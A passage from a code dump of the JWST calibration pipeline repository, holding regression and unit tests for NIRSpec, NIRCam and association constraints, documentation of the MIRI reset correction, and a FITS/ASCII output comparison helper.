ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n def test_nirspec_dark_pipeline(self):\n \"\"\"\n Regression test of calwebb_dark pipeline performed on NIRSpec raw data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84500013001_02103_00003_NRS1_uncal.fits')\n\n pipe = DarkPipeline()\n pipe.suffix = 'dark'\n pipe.ipc.skip = True\n pipe.refpix.odd_even_columns = True\n pipe.refpix.use_side_ref_pixels = True\n pipe.refpix.side_smoothing_length = 11\n pipe.refpix.side_gain = 1.0\n pipe.refpix.odd_even_rows = True\n pipe.output_file = 'jw84500013001_02103_00003_NRS1_uncal.fits'\n\n pipe.run(input_file)\n\n outputs = [('jw84500013001_02103_00003_NRS1_dark.fits',\n 'jw84500013001_02103_00003_NRS1_dark_ref.fits',\n ['primary','sci','err','pixeldq','groupdq'])]\n 
self.compare_outputs(outputs)\n\n def test_nrs_fs_brightobj_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec\n fixed-slit data that uses the NRS_BRIGHTOBJ mode (S1600A1 slit).\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw84600042001_02101_00001_nrs2_rateints.fits')\n collect_pipeline_cfgs()\n args = [\n 'calwebb_tso-spec2.cfg',\n input_file\n ]\n Step.from_cmdline(args)\n\n outputs = [('jw84600042001_02101_00001_nrs2_calints.fits',\n 'jw84600042001_02101_00001_nrs2_calints_ref.fits'),\n ('jw84600042001_02101_00001_nrs2_x1dints.fits',\n 'jw84600042001_02101_00001_nrs2_x1dints_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_nrs_msa_spec2(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec MSA data.\n \"\"\"\n input = 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod.fits'\n input_file = self.get_data(self.test_dir, input)\n self.get_data(self.test_dir, 'jw95065006001_0_short_msa.fits')\n\n # define step for use in test\n step = Spec2Pipeline()\n step.save_results = True\n step.save_bsub = False\n step.output_use_model = True\n step.resample_spec.save_results = True\n step.extract_1d.save_results = True\n step.extract_1d.smoothing_length = 0\n step.extract_1d.bkg_order = 0\n step.run(input_file)\n\n outputs = [('f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_cal.fits',\n 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_cal_ref.fits'),\n ('f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_s2d.fits',\n 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_s2d_ref.fits'),\n ('f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_x1d.fits',\n 'f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_nrs_msa_spec2b(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec MSA data,\n including barshadow correction.\n \"\"\"\n input = 'jw95065_nrs_msaspec_barshadow.fits'\n input_file = self.get_data(self.test_dir, input)\n self.get_data(self.test_dir, 'jwst_nirspec_shutters_barshadow.fits')\n\n step = Spec2Pipeline()\n step.output_file='jw95065_nrs_msaspec_barshadow_cal.fits'\n step.save_bsub = False\n step.save_results = True\n step.resample_spec.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw95065_nrs_msaspec_barshadow_cal.fits',\n 'jw95065_nrs_msaspec_barshadow_cal_ref.fits'),\n ('jw95065_nrs_msaspec_barshadow_s2d.fits',\n 'jw95065_nrs_msaspec_barshadow_s2d_ref.fits'),\n ('jw95065_nrs_msaspec_barshadow_x1d.fits',\n 'jw95065_nrs_msaspec_barshadow_x1d_ref.fits')\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.6221492290496826, "alphanum_fraction": 0.6387520432472229, "avg_line_length": 24.73239517211914, "blob_id": "79c0f336d9a7554096485b7ec6e8cc5c44aa85f1", "content_id": "78f32b308ccbb7ff2877630842202b480f974342", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5481, "license_type": "permissive", "max_line_length": 62, "num_lines": 213, "path": "/jwst/associations/tests/test_constraints.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Constraint Tests\"\"\"\nimport pytest\n\nfrom ..lib.constraint import (\n Constraint,\n SimpleConstraint,\n SimpleConstraintABC,\n)\n\n\ndef test_simpleconstraint_reprocess_match():\n \"\"\"Test options for reprocessing\"\"\"\n sc = SimpleConstraint(\n value='my_value',\n reprocess_on_match=True\n )\n match, reprocess = 
sc.check_and_set('my_value')\n    assert match\n    assert len(reprocess)\n\n\ndef test_simpleconstraint_reprocess_nomatch():\n    \"\"\"Test options for reprocessing\"\"\"\n    sc = SimpleConstraint(\n        value='my_value',\n        reprocess_on_fail=True\n    )\n    match, reprocess = sc.check_and_set('bad_value')\n    assert not match\n    assert len(reprocess)\n\n\ndef test_constraint_reprocess_match():\n    \"\"\"Test options for reprocessing\"\"\"\n    sc = SimpleConstraint(value='my_value')\n    c = Constraint([sc], reprocess_on_match=True)\n    match, reprocess = c.check_and_set('my_value')\n    assert match\n    assert len(reprocess)\n\n\ndef test_constraint_reprocess_nomatch():\n    \"\"\"Test options for reprocessing\"\"\"\n    sc = SimpleConstraint(value='my_value')\n    c = Constraint([sc], reprocess_on_fail=True)\n    match, reprocess = c.check_and_set('bad_value')\n    assert not match\n    assert len(reprocess)\n\n\ndef test_abc():\n    \"\"\"Test ABC itself\"\"\"\n    with pytest.raises(TypeError):\n        SimpleConstraintABC()\n\n\ndef test_simpleconstraint():\n    \"\"\"Test initialization\"\"\"\n\n    # Basic initialization\n    c = SimpleConstraint()\n    assert c.value is None\n    assert c.force_unique\n    assert c.test == c.eq\n\n    # Parameter initialization\n    c = SimpleConstraint(value='my_value')\n    assert c.value == 'my_value'\n\n    # Dict initialization\n    c = SimpleConstraint({'value': 'my_value'})\n    assert c.value == 'my_value'\n\n\ndef test_simpleconstraint_checkset():\n    \"\"\"Test check_and_set\"\"\"\n\n    # Check and set.\n    c = SimpleConstraint()\n    match, reprocess = c.check_and_set('my_value')\n    assert match\n    assert c.value == 'my_value'\n    assert len(reprocess) == 0\n\n    # Non-match\n    c = SimpleConstraint(value='my_value')\n    match, reprocess = c.check_and_set('bad_value')\n    assert not match\n    assert c.value == 'my_value'\n    assert len(reprocess) == 0\n\n    # Don't force unique\n    c = SimpleConstraint(force_unique=False)\n    match, reprocess = c.check_and_set('my_value')\n    assert match\n    assert c.value is None\n    assert len(reprocess) == 0\n\n\ndef test_constraint_default():\n    \"\"\"Test constraint operations\"\"\"\n\n    sc1 = SimpleConstraint()\n    sc2 = SimpleConstraint()\n    c = Constraint([sc1, sc2])\n    match, reprocess = c.check_and_set('my_value')\n    assert match\n    for constraint in c.constraints:\n        assert constraint.value == 'my_value'\n\n\ndef test_invalid_init():\n    with pytest.raises(TypeError):\n        Constraint('bad init')\n\n\ndef test_constraint_all():\n    \"\"\"Test the all operation\"\"\"\n\n    sc1 = SimpleConstraint(value='value_1')\n    sc2 = SimpleConstraint(value='value_2')\n    c = Constraint([sc1, sc2])\n    match, reprocess = c.check_and_set('value_1')\n    assert not match\n\n\ndef test_constraint_any_basic():\n    \"\"\"Test the any operation\"\"\"\n\n    sc1 = SimpleConstraint(value='value_1')\n    sc2 = SimpleConstraint(value='value_2')\n    c = Constraint([sc1, sc2], reduce=Constraint.any)\n    match, reprocess = c.check_and_set('value_1')\n    assert match\n    match, reprocess = c.check_and_set('value_2')\n    assert match\n    match, reprocess = c.check_and_set('value_3')\n    assert not match\n\n\ndef test_constraint_any_remember():\n    \"\"\"Ensure that any doesn't forget other or propositions\"\"\"\n\n    sc1 = SimpleConstraint(value='value_1')\n    sc2 = SimpleConstraint(value='value_2')\n    c = Constraint([sc1, sc2], reduce=Constraint.any)\n    match, reprocess = c.check_and_set('value_1')\n    assert match\n    match, reprocess = c.check_and_set('value_2')\n    assert match\n    match, reprocess = c.check_and_set('value_1')\n    assert match\n    match, reprocess = c.check_and_set('value_3')\n    assert not match\n\n\ndef 
test_iteration():\n    \"\"\"Test various iterations\"\"\"\n    sc = SimpleConstraint()\n    for idx in sc:\n        assert isinstance(idx, SimpleConstraint)\n\n    c = Constraint([sc, sc])\n    count = 0\n    for idx in c:\n        assert isinstance(idx, SimpleConstraint)\n        count += 1\n    assert count == 2\n\n    c = Constraint([\n        Constraint([sc, sc]),\n        Constraint([sc, sc])\n    ])\n    count = 0\n    for idx in c:\n        assert isinstance(idx, SimpleConstraint)\n        count += 1\n    assert count == 4 # Not 6\n\n\ndef test_name_index():\n    \"\"\"Test for name indexing\"\"\"\n    sc1 = SimpleConstraint(name='sc1', value='value1')\n    sc2 = SimpleConstraint(name='sc2', value='value2')\n    c1 = Constraint([sc1, sc2])\n    assert c1['sc1'].value\n    assert c1['sc2'].value\n\n    sc3 = SimpleConstraint(name='sc3', value='value3')\n    sc4 = SimpleConstraint(name='sc4', value='value4')\n    c2 = Constraint([sc3, sc4, c1])\n    assert c2['sc1'].value\n    assert c2['sc2'].value\n    assert c2['sc3'].value\n    assert c2['sc4'].value\n\n    with pytest.raises(KeyError):\n        c2['nonexistant'].value\n\n    with pytest.raises(AttributeError):\n        c2['sc1'].nonexistant\n\n\ndef test_copy():\n    sc1 = SimpleConstraint(name='sc1')\n    sc1_copy = sc1.copy()\n    assert id(sc1) != id(sc1_copy)\n    sc1.check_and_set('value1')\n    assert sc1.value == 'value1'\n    assert sc1_copy.value is None\n    sc1_copy.check_and_set('value2')\n    assert sc1_copy.value == 'value2'\n    assert sc1.value == 'value1'\n" }, { "alpha_fraction": 0.7946699261665344, "alphanum_fraction": 0.7970926761627197, "avg_line_length": 44.23287582397461, "blob_id": "3ac17ae307d51405eded4b14a60c4ef2a71e6b6d", "content_id": "9ed5e3cd95c54052ae206f19c927532689042cfa", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3302, "license_type": "permissive", "max_line_length": 79, "num_lines": 73, "path": "/docs/jwst/reset/description.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Description\n===========\n\n.. note:: The reset step is not currently applied to MIRI exposures, but\n          will likely be reinstated in a future build.\n\nAssumptions\n-----------\nThe reset correction is a MIRI-specific correction. It is\nassumed that the input science data have *NOT* had the zero group (or bias)\nsubtracted. The reset correction should not remove the\nbias signal from the science exposure; therefore, the reset correction\nfor the first group is defined to be zero.\n\nBackground\n__________\n\nFor MIRI exposures, the initial groups in each integration suffer from two\neffects related to the resetting of the detectors. The first effect is that the\nfirst few groups after a reset do not fall\non the expected linear accumulation of signal.\nThe most significant deviations occur in groups 1 and 2.\nThis behavior is relatively uniform detector-wide. The second effect,\non the other hand, is the appearance of\nsignificant extra spatial structure in these initial\ngroups, which fades out in later groups.\n\nThe time constant associated with the reset anomaly is\nroughly a minute, so for full array data the effect has faded out\nby ~group 20. On subarray data, where the read time depends on\nthe size of the subarray, the reset anomaly affects more\ngroups in an integration.\n\nFor multiple integration data, the reset anomaly also varies in amplitude\nfor the first set of integrations before settling down to a relatively\nconstant correction for integrations greater than four for full array\ndata. 
Because of the shorter readout time, the subarray data requires a few\nmore integrations before the effect is relatively stable from integration\nto integration.\n\nAlgorithm\n_________\nThe reset correction step applies the reset reference file.\nThe reset reference file contains an integration-dependent\ncorrection for the first N groups, where N is defined by the reset\ncorrection reference file.\n\nThe format of the reset reference file is NCols X NRows X NGroups X NInts.\nThe current implementation uses a reset anomaly reference file for\nfull array data containing a correction for the first 30 groups for\nintegrations 1-4. The reference file\nwas determined so that the correction is forced to be zero on the last\ngroup for each integration. For each integration in the input science data,\nthe reset corrections are subtracted, group-by-group, integration-by-\nintegration. If the input science data contains more groups than the\nreset correction, then the correction for those groups is zero. If the\ninput science data contains more integrations than the reset correction,\nthen the correction corresponding to the last integration in the reset file\nis used.\n\nThere is a single, NCols X NRows, DQ flag image for all the integrations.\nThe reset DQ flag array is combined with the science PIXELDQ array using\nnumpy's bitwise_or function. The ERR arrays of the science data are\ncurrently not modified at all.\n\nSubarrays\n----------\n\nThe reset correction is subarray-dependent; therefore, this\nstep makes no attempt to extract subarrays from the reset reference file to\nmatch input subarrays. It instead relies on the presence of matching subarray\nreset reference files in the CRDS. In addition, the number of NGROUPS and NINTS\nfor subarray data varies from the full array data as well as from each other.\n" }, { "alpha_fraction": 0.6416075825691223, "alphanum_fraction": 0.6704491972923279, "avg_line_length": 36.76785659790039, "blob_id": "da54ff176c9d6a165c1f803d846dc6d1f22e8201", "content_id": "75ff7e7d8425d68cd8156f9f45e6780f3de23b02", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2115, "license_type": "permissive", "max_line_length": 109, "num_lines": 56, "path": "/jwst/regtest/test_nirspec_mos_spec2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n@pytest.fixture(scope=\"module\")\ndef run_pipeline(jail, rtdata_module):\n    \"\"\"Run the calwebb_spec2 pipeline on a single NIRSpec MOS exposure.\"\"\"\n\n    rtdata = rtdata_module\n\n    # Get the cfg files\n    collect_pipeline_cfgs(\"config\")\n\n    # Get the MSA metadata file referenced in the input exposure\n    rtdata.get_data(\"nirspec/mos/jw95065006001_0_short_msa.fits\")\n\n    # Get the input exposure\n    rtdata.get_data(\"nirspec/mos/f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod.fits\")\n\n    # Run the calwebb_spec2 pipeline; save results from intermediate steps\n    args = [\"config/calwebb_spec2.cfg\", rtdata.input,\n            \"--steps.assign_wcs.save_results=true\",\n            \"--steps.msa_flagging.save_results=true\",\n            \"--steps.extract_2d.save_results=true\",\n            \"--steps.srctype.save_results=true\",\n            \"--steps.wavecorr.save_results=true\",\n            \"--steps.flat_field.save_results=true\",\n            \"--steps.pathloss.save_results=true\",\n            \"--steps.barshadow.save_results=true\"]\n    Step.from_cmdline(args)\n\n    
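# Hand the module-scoped rtdata fixture back so each parametrized test below\n    # can set rtdata.output and fetch its matching truth file\n    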
return rtdata\n\n\[email protected]\[email protected](\"output\",[\n \"assign_wcs\", \"msa_flagging\", \"extract_2d\", \"wavecorr\", \"flat_field\", \"srctype\",\n \"pathloss\", \"barshadow\", \"cal\", \"s2d\", \"x1d\"])\ndef test_nirspec_mos_spec2(run_pipeline, fitsdiff_default_kwargs, output):\n \"\"\"Regression test of the calwebb_spec2 pipeline on a\n NIRSpec MOS exposure.\"\"\"\n\n # Run the pipeline and retrieve outputs\n rtdata = run_pipeline\n rtdata.output = \"f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_\" + output + \".fits\"\n\n # Get the truth files\n rtdata.get_truth(os.path.join(\"truth/test_nirspec_mos_spec2\",\n \"f170lp-g235m_mos_observation-6-c0e0_001_dn_nrs1_mod_\" + output + \".fits\"))\n\n # Compare the results\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n" }, { "alpha_fraction": 0.5664354562759399, "alphanum_fraction": 0.5777493715286255, "avg_line_length": 41.547279357910156, "blob_id": "21d7b87b07fc4fd1346419600d8dd9272aec601b", "content_id": "a91c905b941a8fb2690fdef0671b08b2b1b4b86d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14849, "license_type": "permissive", "max_line_length": 80, "num_lines": 349, "path": "/jwst/tests/compare_outputs.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import copy\nfrom datetime import datetime\nimport os\nfrom difflib import unified_diff\nfrom io import StringIO\n\nfrom ci_watson.artifactory_helpers import (\n get_bigdata,\n BigdataError,\n generate_upload_schema,\n)\n\nfrom astropy.io import fits\nfrom astropy.io.fits import FITSDiff, HDUDiff\n\n\nTODAYS_DATE = datetime.now().strftime(\"%Y-%m-%d\")\n\ndef compare_outputs(outputs, raise_error=True, ignore_keywords=[],\n ignore_hdus=[], ignore_fields=[], rtol=0.0, atol=0.0,\n input_path=[], docopy=True, results_root=None,\n verbose=True):\n \"\"\"\n Compare output with \"truth\" using appropriate\n diff routine; namely:\n * ``fitsdiff`` for FITS file comparisons.\n * ``unified_diff`` for ASCII products.\n Only after all elements of ``outputs`` have been\n processed will the method report any success or failure, with\n failure of any one comparison *not* preventing the rest of the\n comparisons to be performed.\n Parameters\n ----------\n outputs : list of tuple or dict\n This list defines what outputs from running the test will be\n compared. Three distinct types of values as list elements\n are supported:\n * 2-tuple : ``(test output filename, truth filename)``\n * 3-tuple : ``(test output filename, truth filename, HDU names)``\n * dict : ``{'files': (output, truth), 'pars': {key: val}}``\n If filename contains extension such as ``[hdrtab]``,\n it will be interpreted as specifying comparison of just that HDU.\n raise_error : bool\n Raise ``AssertionError`` if difference is found.\n ignore_keywords : list of str\n List of FITS header keywords to be ignored by\n ``FITSDiff`` and ``HDUDiff``.\n ignore_hdus : list of str\n List of FITS HDU names to ignore by ``FITSDiff``.\n This is only available for ``astropy>=3.1``.\n ignore_fields : list of str\n List FITS table column names to be ignored by\n ``FITSDiff`` and ``HDUDiff``.\n rtol, atol : float\n Relative and absolute tolerance to be used by\n ``FITSDiff`` and ``HDUDiff``.\n input_path : list or tuple\n A series of sub-directory names under :func:`get_bigdata_root`\n that leads to the path of the 'truth' files to be compared\n against. 
If not provided, it assumes that 'truth' is in the\n        working directory. For example, with :func:`get_bigdata_root`\n        pointing to ``/grp/test_data``, a file at::\n            /grp/test_data/pipeline/dev/ins/test_1/test_a.py\n        would require ``input_path`` of::\n            [\"pipeline\", \"dev\", \"ins\", \"test_1\"]\n    docopy : bool\n        If `True`, 'truth' will be copied to output directory before\n        comparison is done.\n    results_root : str or `None`\n        If not `None`, for every failed comparison, the test output\n        is automatically renamed to the given 'truth' in the output\n        directory and :func:`generate_upload_schema` will be called\n        to generate a JSON schema for Artifactory upload.\n        If you do not need this functionality, use ``results_root=None``.\n    verbose : bool\n        Print extra info to screen.\n    Returns\n    -------\n    creature_report : str\n        Report from FITS or ASCII comparator.\n        This is part of the error message if ``raise_error=True``.\n    Examples\n    --------\n    There are multiple use cases for this method, specifically\n    related to how ``outputs`` are defined upon calling this method.\n    The specification of the ``outputs`` can be any combination of the\n    following patterns:\n    1. 2-tuple inputs::\n        outputs = [('file1.fits', 'file1_truth.fits')]\n    This definition indicates that ``file1.fits`` should be compared\n    as a whole with ``file1_truth.fits``.\n    2. 2-tuple inputs with extensions::\n        outputs = [('file1.fits[hdrtab]', 'file1_truth.fits[hdrtab]')]\n    This definition indicates that only the HDRTAB extension from\n    ``file1.fits`` will be compared to the HDRTAB extension from\n    ``file1_truth.fits``.\n    3. 3-tuple inputs::\n        outputs = [('file1.fits', 'file1_truth.fits', ['primary', 'sci'])]\n    This definition indicates that only the PRIMARY and SCI extensions\n    should be compared between the two files. This creates a temporary\n    ``HDUList`` object comprising only the given extensions for comparison.\n    4. Dictionary of inputs and parameters::\n        outputs = [{'files': ('file1.fits', 'file1_truth.fits'),\n                    'pars': {'ignore_keywords': ['ROOTNAME']}}]\n    This definition indicates that ROOTNAME will be ignored during\n    the comparison between the files specified in ``'files'``.\n    Any input parameter for ``FITSDiff`` or ``HDUDiff`` can be specified\n    as part of the ``'pars'`` dictionary.\n    In addition, the input files listed in ``'files'`` can also include\n    an extension specification, such as ``[hdrtab]``, to limit the\n    comparison to just that extension.\n    This example from an actual test definition demonstrates\n    how multiple input definitions can be used at the same time::\n        outputs = [\n            ('jw99999_nircam_f140m-maskbar_psfstack.fits',\n             'jw99999_nircam_f140m-maskbar_psfstack_ref.fits'\n            ),\n            ('jw9999947001_02102_00002_nrcb3_a3001_crfints.fits',\n             'jw9999947001_02102_00002_nrcb3_a3001_crfints_ref.fits'\n            ),\n            {'files': ('jw99999_nircam_f140m-maskbar_i2d.fits',\n                       'jw99999_nircam_f140m-maskbar_i2d_ref.fits'),\n             'pars': {'ignore_hdus': ['HDRTAB']}\n            },\n            {'files': ('jw99999_nircam_f140m-maskbar_i2d.fits',\n                       'jw99999_nircam_f140m-maskbar_i2d_ref.fits',\n                       ['primary','sci','dq']),\n             'pars': {'rtol': 0.000001}\n            },\n            {'files': ('jw99999_nircam_f140m-maskbar_i2d.fits[hdrtab]',\n                       'jw99999_nircam_f140m-maskbar_i2d_ref.fits[hdrtab]'),\n             'pars': {'ignore_keywords': ['NAXIS1', 'TFORM*'],\n                      'ignore_fields': ['COL1', 'COL2']}\n            }]\n    .. 
note:: Each ``outputs`` entry in the list gets interpreted and processed\n separately.\n \"\"\"\n __tracebackhide__ = True\n default_kwargs = {'rtol': rtol, 'atol': atol,\n 'ignore_keywords': ignore_keywords,\n 'ignore_fields': ignore_fields,\n 'ignore_hdus': ignore_hdus}\n\n all_okay = True\n creature_report = ''\n updated_outputs = [] # To track outputs for Artifactory JSON schema\n\n for entry in outputs:\n diff_kwargs = copy.deepcopy(default_kwargs)\n extn_list = None\n num_entries = len(entry)\n\n if isinstance(entry, dict):\n entry_files = entry['files']\n actual = entry_files[0]\n desired = entry_files[1]\n if len(entry_files) > 2:\n extn_list = entry_files[2]\n diff_kwargs.update(entry.get('pars', {}))\n elif num_entries == 2:\n actual, desired = entry\n elif num_entries == 3:\n actual, desired, extn_list = entry\n else:\n all_okay = False\n creature_report += '\\nERROR: Cannot handle entry {}\\n'.format(\n entry)\n continue\n\n # TODO: Use regex?\n if actual.endswith(']'):\n if extn_list is not None:\n all_okay = False\n creature_report += (\n '\\nERROR: Ambiguous extension requirements '\n 'for {} ({})\\n'.format(actual, extn_list))\n continue\n actual_name, actual_extn = actual.split('[')\n actual_extn = actual_extn.replace(']', '')\n else:\n actual_name = actual\n actual_extn = None\n\n if desired.endswith(']'):\n if extn_list is not None:\n all_okay = False\n creature_report += (\n '\\nERROR: Ambiguous extension requirements '\n 'for {} ({})\\n'.format(desired, extn_list))\n continue\n desired_name, desired_extn = desired.split('[')\n desired_extn = desired_extn.replace(']', '')\n else:\n desired_name = desired\n desired_extn = None\n\n actual = os.path.abspath(actual)\n\n # Get \"truth\" image\n try:\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n desired = get_bigdata(*input_path, desired_name, docopy=docopy)\n desired = os.path.abspath(desired)\n os.chdir('..')\n except BigdataError:\n all_okay = False\n creature_report += '\\nERROR: Cannot find {} in {}\\n'.format(\n desired_name, input_path)\n continue\n\n if desired_extn is not None:\n desired_name = desired\n desired = \"{}[{}]\".format(desired, desired_extn)\n\n if verbose:\n print(\"\\nComparing:\\n {}\\n {}\".format(actual, desired))\n\n if actual.endswith('.fits') and desired.endswith('.fits'):\n # Build HDULists for comparison based on user-specified extensions\n if extn_list is not None:\n with fits.open(actual) as f_act:\n with fits.open(desired) as f_des:\n actual_hdu = fits.HDUList(\n [f_act[extn] for extn in extn_list])\n actual_hdu.filename = lambda: os.path.basename(actual)\n desired_hdu = fits.HDUList(\n [f_des[extn] for extn in extn_list])\n desired_hdu.filename = lambda: os.path.basename(desired)\n fdiff = FITSDiff(actual_hdu, desired_hdu,\n **diff_kwargs)\n creature_report += '\\na: {}\\nb: {}\\n'.format(\n actual, desired) # diff report only gives hash\n # Working with FITS files...\n else:\n fdiff = FITSDiff(actual, desired, **diff_kwargs)\n\n creature_report += fdiff.report()\n\n if not fdiff.identical:\n all_okay = False\n # Only keep track of failed results which need to\n # be used to replace the truth files (if OK).\n updated_outputs.append((actual, desired))\n\n elif actual_extn is not None or desired_extn is not None:\n if 'ignore_hdus' in diff_kwargs: # pragma: no cover\n diff_kwargs.pop('ignore_hdus') # Not applicable\n\n # Specific element of FITS file specified\n with fits.open(actual_name) as f_act:\n with fits.open(desired_name) as f_des:\n actual_hdu = f_act[actual_extn]\n 
desired_hdu = f_des[desired_extn]\n fdiff = HDUDiff(actual_hdu, desired_hdu, **diff_kwargs)\n\n creature_report += 'a: {}\\nb: {}\\n'.format(actual, desired)\n creature_report += fdiff.report()\n\n if not fdiff.identical:\n all_okay = False\n # Only keep track of failed results which need to\n # be used to replace the truth files (if OK).\n updated_outputs.append((actual_name, desired_name))\n\n else:\n # ASCII-based diff\n with open(actual) as afile:\n actual_lines = afile.readlines()\n with open(desired) as dfile:\n desired_lines = dfile.readlines()\n\n udiff = unified_diff(actual_lines, desired_lines,\n fromfile=actual, tofile=desired)\n udiffIO = StringIO()\n udiffIO.writelines(udiff)\n udiff_report = udiffIO.getvalue()\n udiffIO.close()\n\n if len(udiff_report) == 0:\n creature_report += ('\\na: {}\\nb: {}\\nNo differences '\n 'found.\\n'.format(actual, desired))\n else:\n all_okay = False\n creature_report += udiff_report\n # Only keep track of failed results which need to\n # be used to replace the truth files (if OK).\n updated_outputs.append((actual, desired))\n\n if not all_okay and results_root is not None: # pragma: no cover\n schema_pattern, tree, testname = generate_upload_params(\n results_root, updated_outputs, verbose=verbose)\n generate_upload_schema(schema_pattern, tree, testname)\n\n if not all_okay and raise_error:\n raise AssertionError(os.linesep + creature_report)\n\n return creature_report\n\n\ndef generate_upload_params(results_root, updated_outputs, verbose=True):\n \"\"\"\n Generate pattern, target, and test name for :func:`generate_upload_schema`.\n This uses ``BUILD_TAG`` and ``BUILD_MATRIX_SUFFIX`` on Jenkins CI to create\n meaningful Artifactory target path. They are optional for local runs.\n Other attributes like user, time stamp, and test name are also\n automatically determined.\n In addition to renamed outputs, ``*.log``is also inserted into the\n ``schema_pattern``.\n Parameters\n ----------\n results_root : str\n See :func:`compare_outputs` for more info.\n updated_outputs : list\n List containing tuples of ``(actual, desired)`` of failed\n test output comparison to be processed.\n verbose : bool\n Print extra info to screen.\n Returns\n -------\n schema_pattern, tree, testname\n Analogous to ``pattern``, ``target``, and ``testname`` that are\n passed into :func:`generate_upload_schema`, respectively.\n \"\"\"\n import getpass\n\n # Create instructions for uploading results to artifactory for use\n # as new comparison/truth files\n testname = os.path.split(os.path.abspath(os.curdir))[1]\n\n # Meaningful test dir from build info.\n # TODO: Organize results by day test was run. 
Could replace with git-hash\n whoami = getpass.getuser() or 'nobody'\n user_tag = 'NOT_CI_{}'.format(whoami)\n build_tag = os.environ.get('BUILD_TAG', user_tag)\n build_matrix_suffix = os.environ.get('BUILD_MATRIX_SUFFIX', '0')\n subdir = '{}_{}_{}'.format(TODAYS_DATE, build_tag, build_matrix_suffix)\n tree = os.path.join(results_root, subdir, testname) + os.sep\n schema_pattern = []\n\n # Write out JSON file to enable retention of different results.\n # Also rename outputs as new truths.\n for test_result, truth in updated_outputs:\n schema_pattern.append(test_result)\n if verbose:\n print(\"\\nFailed comparison:\")\n print(\" {}\".format(test_result))\n print(\" {}\".format(truth))\n\n return schema_pattern, tree, testname\n" }, { "alpha_fraction": 0.44609054923057556, "alphanum_fraction": 0.565432071685791, "avg_line_length": 38.83606719970703, "blob_id": "8e194c0949320cdaffdc4de48d5f94d9bcae6a06", "content_id": "d7932ced80664aaa286ba25d2cac96b6ccecc3fd", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2430, "license_type": "permissive", "max_line_length": 77, "num_lines": 61, "path": "/jwst/tests_nightly/general/nircam/test_coron3_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.pipeline import Coron3Pipeline\n\n\[email protected]\nclass TestCoron3Pipeline(BaseJWSTTest):\n rtol = 0.00001\n atol = 0.00001\n input_loc = 'nircam'\n ref_loc = ['test_coron3', 'truth']\n\n def test_coron3_1(self):\n \"\"\"Regression test of calwebb_coron3 pipeline.\n\n Test is performed on NIRCam simulated data.\n \"\"\"\n asn_name = 'jw99999-a3001_20170327t121212_coron3_001_asn.json'\n override_psfmask = 'jwst_nircam_psfmask_somb.fits'\n\n # get a local copy of the inputs\n asn_file = self.get_data('test_coron3', asn_name)\n psfmask_file = self.get_data('test_coron3', override_psfmask)\n for file in raw_from_asn(asn_file):\n self.get_data('test_coron3', file)\n\n pipe = Coron3Pipeline()\n pipe.align_refs.override_psfmask = psfmask_file\n pipe.outlier_detection.resample_data = False\n pipe.run(asn_file)\n\n self.ignore_keywords += ['NAXIS1', 'TFORM*']\n self.ignore_fields = self.ignore_keywords\n\n outputs = [( # Compare psfstack product\n 'jw99999-a3001_t1_nircam_f140m-maskbar_psfstack.fits',\n 'jw99999-a3001_t1_nircam_f140m-maskbar_psfstack_ref.fits'\n ),\n ( # Compare psfalign product\n 'jw9999947001_02102_00001_nrcb3_a3001_psfalign.fits',\n 'jw99999-a3001_t1_nircam_f140m-maskbar_psfalign_ref.fits'\n ),\n ( # Compare psfsub product\n 'jw9999947001_02102_00001_nrcb3_a3001_psfsub.fits',\n 'jw9999947001_02102_00001_nrcb3_psfsub_ref.fits'\n ),\n ( # Compare level-2c products\n 'jw9999947001_02102_00001_nrcb3_a3001_crfints.fits',\n 'jw9999947001_02102_00001_nrcb3_a3001_crfints_ref.fits'\n ),\n (\n 'jw9999947001_02102_00002_nrcb3_a3001_crfints.fits',\n 'jw9999947001_02102_00002_nrcb3_a3001_crfints_ref.fits'\n ),\n ( # Compare i2d product\n 'jw99999-a3001_t1_nircam_f140m-maskbar_i2d.fits',\n 'jw99999-a3001_t1_nircam_f140m-maskbar_i2d_ref.fits'\n )\n ]\n self.compare_outputs(outputs)\n" }, { 